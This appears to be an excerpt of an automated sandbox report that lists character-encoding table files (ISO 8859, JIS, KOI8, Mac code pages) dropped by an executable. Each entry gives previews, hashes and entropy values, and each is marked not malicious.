                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-8, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0000000A200A300A400A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000002017..05D005D105D205D305
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.2591070910715714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:XHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkBSMH+tA/b:XMlBVnrAMiwMmTmokgzAD
                                                                                                                                                                                                                              MD5:0B99E605E73B7D8DEFD8D643F5729748
                                                                                                                                                                                                                              SHA1:F30E7CCBCD9C539126E8D6CA0886E4B2BD54E05D
                                                                                                                                                                                                                              SHA-256:CF51E867DDE2F19553D98FEEC45A075C4B4F480FB1EDADB3D8DAD1EBEA9299F3
                                                                                                                                                                                                                              SHA-512:DA0487CD7F2143195E80697C17FFDB61AFD464C888DDF84813B2B5D1BAB24D96466DA7A7F77C8E4A9D0D53F34D72928923380AFC1B92A96C0A3BFF46006A4E19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-9, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.2708615484795676
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zBHVBUlJvRj7SOVbusZhAMiZyi77qN8VmKfkiJt0RMFS:zBMlBVnrAMiwMmNPYPFS
                                                                                                                                                                                                                              MD5:4E21F24F8D9CC5DF16B29CACD997AC69
                                                                                                                                                                                                                              SHA1:064E723EFB82EF1C303E5267496304288821E404
                                                                                                                                                                                                                              SHA-256:61B14A7C312366F79BB45F02C6B7EE362E6F51CBAD5E479E563C7F7E785DB654
                                                                                                                                                                                                                              SHA-512:AF8FAEB47EFB51F2537139F7C4254ABED119E477FD2B5E83B90B7A903B43C4E02DDF43A7DDB044A0A9601E9F9ADE91B02EE7C0EC87FF5DDCF9951B9601A90435
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: jis0201, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..00000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81772
                                                                                                                                                                                                                              Entropy (8bit):2.3571626869060776
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:AigXM6CwL/9pV7Hl6+Yko9gZxErA3/MS/8xqg8:AZ/tp1Hl2KZxUfr8
                                                                                                                                                                                                                              MD5:F0661E22C7455994AA1F6EC1EDA401B4
                                                                                                                                                                                                                              SHA1:928B2AC46A9FDE61A81F56BE225E6138B40C22E5
                                                                                                                                                                                                                              SHA-256:F6B1C6AC5F5FC4E990A7A1AAC16A406012040936431BEFE7D2B6CD1DA9E422C4
                                                                                                                                                                                                                              SHA-512:917CC58678A9E9F5CBE860D30828846ABA4EA8CDFAB7DD1AE6A66C47ECBB85CF67DD97BC3E6F95341DD30F4E757B2CEA571708D5B4CED18A29F19904C3138AE0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: jis0208, double-byte..D..2129 0 77..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000300030013002FF0CFF0E30FBFF1AFF1BFF1FFF01309B309C00B4FF4000A8..FF3EFFE3FF3F30FD30FE309D309E30034EDD30053006300730FC20152010FF0F..FF3C301C2016FF5C2026202520182019201C201DFF08FF0930143015FF3BFF3D..FF5BFF5D30083009300A300B300C300D300E300F30103011FF0B221200B100D7..00F7FF1D2260FF1CFF1E22662267221E22342642264000B0203220332103FFE5..FF0400A200A3FF05FF03FF06FF0AFF2000A72606260525CB25CF25CE25C70000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):72133
                                                                                                                                                                                                                              Entropy (8bit):2.3455261548208055
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:9F/D7CH2puD5CdzU3nAkP5dHn7s391fmOarFaVQ:H/D7CHbozU3nAk3H7sXm3FgQ
                                                                                                                                                                                                                              MD5:07CE2C135BE17DBAFA558AA5949A53DB
                                                                                                                                                                                                                              SHA1:5D9DBEFCCB44E76C1A4E61360C6FCED8DCC8EF4D
                                                                                                                                                                                                                              SHA-256:785CFC5F5D9CB06DB8061730AB0016A0F70D0B59F6787D2A3CBB8D5779C99706
                                                                                                                                                                                                                              SHA-512:E954D7198D58ACEDEB4C8E5F466107767C3DA43763A5F6CDDFCF567226F9B22B4C2DE27564F28CD125D7F1BA7CB9C6DE6DEC4065EC2676572C793BE458FDDD9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: jis0212, double-byte..D..2244 0 68..22..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000000000000000000000000000000000000000002D8..02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000..0000000000A100A600BF00000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000BA00AA00A900AE2122..00A4211600000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.531149521168141
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KcJ5mHVBUlJvRj7SOVbusZhAMiZyi77qpSzIa9qVRS3YcEchJh3MAxSl:KmmMlBVnrAMiwMmAzIxVgBE6cAxQ
                                                                                                                                                                                                                              MD5:96F54CC639ACA8E466FB8058144C9350
                                                                                                                                                                                                                              SHA1:0B9530D6080F2BAACABD5AA0D48BFF316FCCEF64
                                                                                                                                                                                                                              SHA-256:0E43244BFC4F33FACB844B9E00270A1A4C24DC59B8A9B95104E2D788BB2F59FD
                                                                                                                                                                                                                              SHA-512:5B7859325E5E34C9D4558B1198795BB9C6A8EF783EB97193EA80BA76C38AFE9BDD1B526B77401DF5456B7A0E85E942191FFD4B4F2B9F0C8168A7093EE452802E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: koi8-r, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204512553255425552556255725582559255A255B255C255D255E..255F25602561040125622563256425652566256725682569256A256B256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.5076564572101714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:K+HVBUlJvRj7SOVbusZhAMiZyi77qpSzIaU3dmVRS3YcEchJh3MAxSl:K+MlBVnrAMiwMmAzI/EVgBE6cAxQ
                                                                                                                                                                                                                              MD5:4B755EF2288DFC4009759F8935479D68
                                                                                                                                                                                                                              SHA1:C3BDF0D9DF316DE8919DAA4329275C5AA81D61B4
                                                                                                                                                                                                                              SHA-256:ED04D5B977B8C8944D8760B713FF061292DA5634BCBB67CDFB1C3A6FF5378C81
                                                                                                                                                                                                                              SHA-512:3F1E1CC47327054FB9C54157ED10514230F10BFCD4BD9FDAFA02D7B238137DC7442CA2661B0739D8EEA3181E187D3B639A2C8118A0DE272C96000908121B6CFB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: koi8-u, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204510454255404560457255725582559255A255B0491255D255E..255F25602561040104032563040604072566256725682569256A0490256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94393
                                                                                                                                                                                                                              Entropy (8bit):2.4104200953565513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:XbjO7Uw6uKdosXRxps9a+ut/BmZPwkpT9A0T03o:XfO4ZBRxpV+4wPwKloo
                                                                                                                                                                                                                              MD5:366C09E4A4CC10006E593F5B3F3461D7
                                                                                                                                                                                                                              SHA1:A0DABFBEEB66E26FB342844EA41772D7A1D19C24
                                                                                                                                                                                                                              SHA-256:9B27FE7E7054F36E279993F19E52E18AC03360D117AE80C42B4E984A97C590AA
                                                                                                                                                                                                                              SHA-512:670F32D698C7992038E736D3AD40098D8589C0C5A1379E32A0F02A02FAF251B1312CAD131DDADC3F80B23A3821A91689F2E310309028BDDDF227D532EB505A20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: ksc5601, double-byte..D..233F 0 89..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300200B72025202600A8300300AD20152225FF3C223C20182019..201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7..00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640..222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6..25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D..221D2235222B222C2208220B2286228722822283222A222922272228FFE20000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.4295694929963667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8jHVBUlJvRj7SOVbusZhAMiZyi77qHVPJSf2FcVDu1LEe4qPPMl2J89:8jMlBVnrAMiwMmHEmJ4IMgi9
                                                                                                                                                                                                                              MD5:10850BCFB943318284D6191494EBD7D5
                                                                                                                                                                                                                              SHA1:237D5DDF7969A422991F17021244D13A2BB0DE92
                                                                                                                                                                                                                              SHA-256:81ECA6840B87F2DEF9FCDD171A55C2D71A49386D88401CE927AE57D7DDD7AAAA
                                                                                                                                                                                                                              SHA-512:D797781C228B70D2D83DB8ABA08F840CE49846C9473CC89A2E316900D9E08A63142E68AD9ABBB2EF67BF9F1D392772FAB36CCC09632022A1437AE27C11F2284F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macCentEuro, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179..017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC..202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E..012F012A22642265012B0136220222110142013B013C013D013E0139013A0145..0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C..20132014201C201D2018201900F725CA014D0154015501582039203A01590156..01570160201A201E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.3992482002374516
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8ULyHVBUlJvRj7SOVbusZhAMiZyi77qsTMdKxOZwwL+KR5D/jlJy6QWky:8ULyMlBVnrAMiwMmOsL+KR5DblE85
                                                                                                                                                                                                                              MD5:A60FBDE33D13C732095713D1AB6713AB
                                                                                                                                                                                                                              SHA1:4B0EB443F2D0E4B8DB7D0435F9311E5F9A625123
                                                                                                                                                                                                                              SHA-256:BBE6F5EBB5EAB08C91DF7D524FAF39B03AA8B9F84C67ABA0553A84EC56668CB9
                                                                                                                                                                                                                              SHA-512:3EEBA6BA3FCD875AFBD5DF41EDC21E872416A48D03343232904CC99CAF913045DAF7B1A1ACD0949EF794AD7B6C9AE8F93808423FFC4B67718E732B2FF5D9B6D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macCroatian, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8..221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8..00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153..01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB..201300B7201A201E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.4178221849964903
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8dHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJY:8dMlBVnrAMiwMm8Y6zUk+UVsJY
                                                                                                                                                                                                                              MD5:C390D66441AC61CCF0A685CA5EE0BC1C
                                                                                                                                                                                                                              SHA1:FCAE825B54400B9D736EF22A613E359E3F0FA6C2
                                                                                                                                                                                                                              SHA-256:76EFE571ADDA7AED467F146CB0BD3A2351F2A720508EA0642C419F5347789CAA
                                                                                                                                                                                                                              SHA-512:C891DB15E0F600965885DE6745EDD2A4E3A6A20CA30A9AAE89CBD8C429F8455C4AF7F2FC053FB3D730D8544AB6A6E78E769DB93DAD7B29868B746FA10373F021
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macCyrillic, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..0430043104320433
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.870022681111701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:87JMHkUlJvRjmf9RCsUBOdXsCbbNviANpkDP1XFAoE4xSF5HrBPkdn:87KvlA9RCs6CXrViANUP1XFA9eSvdPKn
                                                                                                                                                                                                                              MD5:DCE78527E3A7B7CB1DE9EE5FAF12AFC6
                                                                                                                                                                                                                              SHA1:20F4A3F4DB6B3422C04EBB6B21A568E4C173F9C1
                                                                                                                                                                                                                              SHA-256:062E31D48DC33160999074E49205E08C3655DFF91C2C87F254522E6EBCE2DD96
                                                                                                                                                                                                                              SHA-512:627F5FD2F12B341F2D7EE9032946FE057C4AC74D99687178CEA98B3E150307BB6AA2495B0FA46400760D467E2BF589BE31E998E25CE1D1E8465DA61F22047345
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macDingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4954458011071323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8dOHVBUlJvRj7SOVbusZhAMiZyi77qJlbaBMD2aSY5us36Ekp1ysOSU2imR:8kMlBVnrAMiwMm7aKPVusqx1ysOJjmR
                                                                                                                                                                                                                              MD5:0CC92F685A4132BE4B030006670D81CE
                                                                                                                                                                                                                              SHA1:13B1074A90055E9EA061A6206A9C004DA29967A9
                                                                                                                                                                                                                              SHA-256:1AABE561B5C944ABD11C293D4ACAC0F3A4A5A9E84A0342D066F4E3E992348895
                                                                                                                                                                                                                              SHA-512:E1AF3D47D681CD68B6063DEC1241631CABE86FE835232FA73D855AC74D0175540D46511282BE7198A67A37970A5D05CDECF55C10424ED9C1413C108F116094D9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macGreek, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8..00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC..2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7..039100B12264226500A503920395039603970399039A039C03A603AB03A803A9..03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153..20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F..03CD03B103B203C803B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3991839018654573
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8KHVBUlJvRj7SOVbusZhAMiZyi77qscqMVmOZmk/LYRldjY/g4JyMWG:8KMlBVnrAMiwMmzqi/LYRlYBEXG
                                                                                                                                                                                                                              MD5:747ADBE54D6992467415E322326FA1B9
                                                                                                                                                                                                                              SHA1:5E3967B5DDF3A6DBF07E90ED6B9B9C2F3F3F35FE
                                                                                                                                                                                                                              SHA-256:6FD08CE6FBA521D51E8058DE5C2DBD6583B80306A8BE7D015361F76314E70A35
                                                                                                                                                                                                                              SHA-512:A04B946993985BF1F8FBA3A7A9AD3838F43F8F27F69B1FB1015D9DC8612AAFCE24E30CBC1FCABBDFB359FD487D51F70F18DA0CDA4A87749A2C82309CEB054849
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macIceland, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE..00FD00B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48813
                                                                                                                                                                                                                              Entropy (8bit):3.3767502114972077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:K/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSJi:KVUidzJCurDGSk
                                                                                                                                                                                                                              MD5:3DCD22325E0194AAD4959C939B1DE24D
                                                                                                                                                                                                                              SHA1:ABEF1372FBDA83714CE29E015D9A198D4B37B21C
                                                                                                                                                                                                                              SHA-256:47007D9EBF4D34C6CE3599E50AFC7C1CF8129B88994DE2C2A857C09003F9CD2B
                                                                                                                                                                                                                              SHA-512:B8ADFD2315EA38E5F7D4DED219759380069AAB539F1B5AAA5626CE32428CBBEB5E8215AD8351E023BCF72FA4DC30AB40CF59D6D45E33B6D1A6B41BEBFD4BD4C2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
